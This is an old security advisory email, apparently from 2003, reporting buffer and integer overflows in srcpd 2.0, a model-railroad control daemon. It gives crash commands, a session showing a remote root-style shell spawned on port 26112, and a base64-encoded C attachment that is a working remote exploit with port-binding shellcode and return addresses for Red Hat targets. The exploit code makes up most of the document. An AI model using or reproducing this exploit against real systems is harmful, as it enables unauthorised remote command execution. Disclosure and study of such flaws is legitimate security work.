------------BE6E21C1911196C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

/***********************************************
*
*            m00 security advistory #001
*
*          Buffer overflows in Srcpd v2.0
*
*              www.m00security.org
*
*       overg[at]mail.ru    h0snp[at]mail.ru
*
************************************************/

---------------------------------------
Product: srcpd
Version: 2.0 (other ?)
OffSite: http://srcpd.sourceforge.net
Problem: buffer & integer overflows.
---------------------------------------

Vulnerability file:
/usr/sbin/srcpd


Description the package:

The srcpd is a server daemon that enables
you to control and play with a digital model
railroad using any SRCP Client. Actually 
it supports an Intellibox (tm), a Marklin
Interface 6050 or 6051 (tm?), and many more 
interfaces. More information about SRCP and 
links to many really cool clients (and other 
servers for different hardware) can be found 
at http://srcpd.sourceforge.net and 
http://www.der-moba.de/Digital 
This is a beta release, do not use for production!

SRCP - Simple Railroad Command Protocol.


1. Local buffer overflow.

In File srcpd.c length 'conffile' = MAXPATHLEN.
If 'conffile' > MAXPATHLEN then srcpd is 'crashed'.

[over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 1197)]
0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6


2. Remote integer overflow.

[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
srcpd V2; SRCP 0.8.2
go 11111111
1060333759.411 200 OK GO 1
go 11111111
Connection closed by foreign host.

[over@localhost m00]$ telnet localhost 12340
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused


3. Remote stack overflow/command execution.

There are multiply stack overflow vulnerabilities in method
handlers. For example, handleSET() , handleGET() and other. 
Therefore we can smash the stack and get a shell.
See code for more info...

Remote exploit attached.

example:

[h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0
 ** ***************************************** **
 ** Srcpd v2.0 remote exploit by m00 Security **
 ** ***************************************** **
 Conneting...OK
 using RET = 0xbf1fcb61
 now, if you was lucky with ret, shell spawned on 26112.
[h0snp@h0m3 srcpd]$ telnet localhost 26112
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)


(c) m00 Security / Over_G & h0snp
------------BE6E21C1911196C
Content-Type: application/octet-stream; name="m00-srcpd.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="m00-srcpd.c"

LyoKICogICAgbTAwIFNlY3VyaXR5IAogKiB3d3cubTAwc2VjdXJpdHkub3JnIAogKiBzcmNwZCAg
PTwgMi4wIHJlbW90ZSBleHBsb2l0CiAqIAogKiBBdWRpdGVkIGJ5IGgwc25wICYmIE92ZXJfRy4K
ICogUHJvZ3JhbW1lZCBieSBoMHNucC4KICogMjAwMy4KICogLS0tLS0tLS0tLQogKiBDb250YWN0
OiAjbTAwIGF0IGlyYy53b20ucnUKICovCiAKIAojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNs
dWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxuZXRkYi5oPgojaW5jbHVkZSA8bmV0aW5ldC9p
bi5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8
c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVk
ZSA8Z2V0b3B0Lmg+CgojZGVmaW5lIFNDT0RFTEVOCTE0OAojZGVmaW5lIE5PUAkJCTB4OTAKI2Rl
ZmluZSBSRVQJCQkweGJmMWZjYjYxCgoKCgoKCnVuc2lnbmVkIGxvbmcgaW50IHJlc29sdmUoY2hh
ciAqaG9zdCkKewoJIGxvbmcgaTsKCSBzdHJ1Y3QgaG9zdGVudCAqaGU7CgkgCgkgaSA9IGluZXRf
YWRkcihob3N0KTsKCSBpZiAoaSA8IDApIAoJIHsKCSAJaGUgPSBnZXRob3N0YnluYW1lKGhvc3Qp
OwoJIAlpZiAoIWhlKSByZXR1cm4gKDApOwogICAgICAJIGVsc2UgICAgICAgICAgIHJldHVybiAo
Kih1bnNpZ25lZCBsb25nICopaGUtPmhfYWRkcik7ICAgICAgCQogIAkgfQogICAJcmV0dXJuIChp
KTsKfQoKIAppbnQgbWFrZV9jb25uZWN0KGNoYXIgKmFkZHJlc3MsIHVuc2lnbmVkIHNob3J0IHBv
cnQpCnsKCWludCBzb2NrLGk7CglzdHJ1Y3Qgc29ja2FkZHJfaW4gcGVlcjsKCQoJc29jayA9IHNv
Y2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOwoJaWYgKHNvY2sgPD0gMCkgcmV0dXJuIC0xOwoJ
CglpZiAoIShpID0gcmVzb2x2ZShhZGRyZXNzKSkpIHJldHVybiAtMjsgCgkJZWxzZQoJCXsKCQkJ
cGVlci5zaW5fZmFtaWx5ID0gQUZfSU5FVDsKICAgIAkJcGVlci5zaW5fYWRkci5zX2FkZHIgPSBp
OwoJCQlwZWVyLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7CgkJfQkJCglpZiAoIShjb25uZWN0KHNv
Y2ssKHN0cnVjdCBzb2NrYWRkciAqKSZwZWVyLHNpemVvZiBwZWVyKSkpIHJldHVybiAoc29jayk7
CgkJZWxzZSB7IGNsb3NlKHNvY2spOyByZXR1cm4gLTM7IH0KfQoKdW5zaWduZWQgY2hhciBzY29k
ZVtdPSAKIlx4MzFceGMwXHgzMVx4ZGJceDMxXHhjOVx4MzFceGQyXHhiMFx4NjZceGIzXHgxXHg1
MVx4YjFceDZceDUxXHhiMVx4MSIKIlx4NTFceGIxXHgyXHg1MVx4OGRceGNceDI0XHhjZFx4ODBc
eGIzXHgyXHhiMVx4Mlx4MzFceGM5XHg1MVx4NTFceDUxXHg4MCIKIlx4YzFceDY2XHg2Nlx4NTFc
eGIxXHgyXHg2Nlx4NTFceDhkXHhjXHgyNFx4YjJceDEwXHg1Mlx4NTFceDUwXHg4ZFx4Y1x4MjQi
CiJceDg5XHhjMlx4MzFceGMwXHhiMFx4NjZceGNkXHg4MFx4YjNceDFceDUzXHg1Mlx4OGRceGNc
eDI0XHgzMVx4YzBceGIwXHg2NiIKIlx4ODBceGMzXHgzXHhjZFx4ODBceDMxXHhjMFx4NTBceDUw
XHg1Mlx4OGRceGNceDI0XHhiM1x4NVx4YjBceDY2XHhjZFx4ODAiCiJceDg5XHhjM1x4MzFceGM5
XHgzMVx4YzBceGIwXHgzZlx4Y2RceDgwXHg0MVx4MzFceGMwXHhiMFx4M2ZceGNkXHg4MFx4MzEi
CiJceGRiXHg1M1x4NjhceDZlXHgyZlx4NzNceDY4XHg2OFx4MmZceDJmXHg2Mlx4NjlceDg5XHhl
M1x4OGRceDU0XHgyNFx4OCIKIlx4MzFceGM5XHg1MVx4NTNceDhkXHhjXHgyNFx4MzFceGMwXHhi
MFx4Ylx4Y2RceDgwXHgzMVx4YzBceGIwXHgwMVx4Y2RceDgwIjsKCgpsb25nIGdldF9lc3AoKXsJ
X19hc21fXyAoIm1vdmwgJWVzcCwlZWF4Iik7IH0KCnN0cnVjdAp7CgljaGFyKiAJCSB0eXBlOwoJ
bG9uZyAgCQkgcmV0OwoJdW5zaWduZWQgaW50IHJlcDsKfSB0YXJnZXRzW109CnsKIHsiUmVkIEhh
dCBMaW51eCA5LjAgeDg2IHNyY3BkIDIuMCAoYnVpbGQgZ2NjIDMuMi4yKSIsUkVULDEzfSwKIHsi
UmVkIEhhdCBMaW51eCA5LjAgeDg2IHNyY3BkIDIuMCAoZnJvbSBycG0pIiwweGJmMWZjYmExLDZ9
LAogeyJSZWQgSGF0IExpbnV4IDcuMyB4ODYgc3JjcGQgMi4wIChmcm9tIHJwbSkiLDB4NDI5MzFi
NTEsNn0sCn0sIGR1bWI7Cgp2b2lkIHVzYWdlKGNoYXIqIG5hbWUpCnsKCWludCBpOwoJCglwcmlu
dGYoIlxyU3JjcGQgdjIuMCByZW1vdGUgZXhwbG9pdCBieSBtMDAgU2VjdXJpdHlcbiIpOwoJcHJp
bnRmKCJ1c2FnZTogJXMgLWggPGhvc3Q+IC1wIDxwb3J0PiAtdCA8dGFyZ2V0PiBbLW8gPG9mZnNl
dD5dIFxuIixuYW1lKTsKCXByaW50ZigiYXZpYWxhYmxlIHRhcmdldHM6XG4iKTsKCWZvciAoaSA9
MDsgaTwgc2l6ZW9mKHRhcmdldHMpL3NpemVvZihkdW1iKTsgaSsrKQoJCXByaW50ZigiICUzZCAv
IDB4JS44eCAvICVzIFxuIixpLHRhcmdldHNbaV0ucmV0LHRhcmdldHNbaV0udHlwZSk7CglleGl0
KDApOwp9CgogCgppbnQgbWFpbihpbnQgYXJnYywgY2hhciogYXJndltdKQp7CQoJY2hhciogaG9z
dCwqYnVmLCpyY3ZidWY7Cglsb25nICByZXQgPSBSRVQvKmdldF9lc3AoKSovLCphZGRyOwoJaW50
ICAgcmV6LHBvcnQ9MTIzNDAsc29jayxwb3MsaSx0cmd0OwoKCWlmIChhcmdjIDwgNCkgdXNhZ2Uo
YXJndlswXSk7CgkKCXdoaWxlICgocmV6ID0gZ2V0b3B0KGFyZ2MsYXJndiwiaDpwOm86dDoiKSkg
IT0gLTEpCgkJc3dpdGNoIChyZXopCgkJewoJCQljYXNlICdoJzogaG9zdCA9IG9wdGFyZzsgICAg
ICAgYnJlYWs7CgkJCWNhc2UgJ3AnOiBwb3J0ID0gYXRvaShvcHRhcmcpOyBicmVhazsKCQkJY2Fz
ZSAnbyc6IHJldCAtPSBhdG9sKG9wdGFyZyk7IGJyZWFrOwoJCQljYXNlICd0JzogdHJndCA9IGF0
b2kob3B0YXJnKTsgYnJlYWs7CQkJCQoJCQljYXNlICc/JzogYnJlYWs7CgkJfQoJcHJpbnRmKCIg
KiogKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiogKipcbiIpOyAJCQoJ
cHJpbnRmKCIgKiogU3JjcGQgdjIuMCByZW1vdGUgZXhwbG9pdCBieSBtMDAgU2VjdXJpdHkgKipc
biIpOwoJcHJpbnRmKCIgKiogKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KiogKipcbiIpOwoJcHJpbnRmKCIgQ29ubmV0aW5nLi4uIik7CglpZiAoKHNvY2sgPSBtYWtlX2Nv
bm5lY3QoaG9zdCxwb3J0KSkgPD0gMCkKCXsKCQlwZXJyb3IoIiBjb25uZWN0KCkiKTsKCQlleGl0
KC0xKTsJCQoJfQoJcmV0ID0gdGFyZ2V0c1t0cmd0XS5yZXQ7CglwcmludGYoIk9LXG4gdXNpbmcg
UkVUID0gMHgleFxuIixyZXQpOwkKCWJ1ZiAgICA9IChjaGFyKiltYWxsb2MoMjIwKTsKCXJjdmJ1
ZiA9IChjaGFyKiltYWxsb2MoNTEyKTsJCglwb3MgPSByZWN2KHNvY2sscmN2YnVmLDUxMiwwKTsJ
ICAgIAoJcHJpbnRmKCIgU2VuZGluZy4uLiIpOwoJaWYgKHBvcyA8PSAwIHx8IHBvcyA9PSBFT0Yp
IHJldHVybiAtMTsJCglzZW5kKHNvY2ssImdvIDExMTExXHJcbiIsMTAsMCk7CQoJcG9zID0gcmVj
dihzb2NrLHJjdmJ1Ziw1MTIsMCk7CSAgICAKCWlmIChwb3MgPD0gMCB8fCBwb3MgPT0gRU9GKSBy
ZXR1cm4gLTE7CgltZW1zZXQoYnVmLE5PUCwyMDApOwoJbWVtY3B5KGJ1Ziwic2V0IDEgbG9jayAi
LDExKTsKCWFkZHIgPSAobG9uZyopKGJ1ZisxMSk7Cglmb3IgKGkgPTA7IGk8IHRhcmdldHNbdHJn
dF0ucmVwOyBpKyspCgkJKihhZGRyKyspID0gcmV0OwoJKihhZGRyKyspID0gJ1x4MjAnOwkKCW1l
bWNweShidWYrdGFyZ2V0c1t0cmd0XS5yZXAqNCsxMixzY29kZSxTQ09ERUxFTik7CglidWZbMjE5
XSA9ICdcMCc7CglwcmludGYoIk9LXG4iKTsJCglzZW5kKHNvY2ssYnVmLDIyMCwwKTsKCXByaW50
ZigiIG5vdywgaWYgeW91IHdhcyBsdWNreSB3aXRoIHJldCwgc2hlbGwgc3Bhd25lZCBvbiAyNjEx
Mi5cbiIpOwoJZnJlZShidWYpOwoJZnJlZShyY3ZidWYpOwoJY2xvc2Uoc29jayk7CglyZXR1cm4g
MDsgCiB9Cg==

------------BE6E21C1911196C--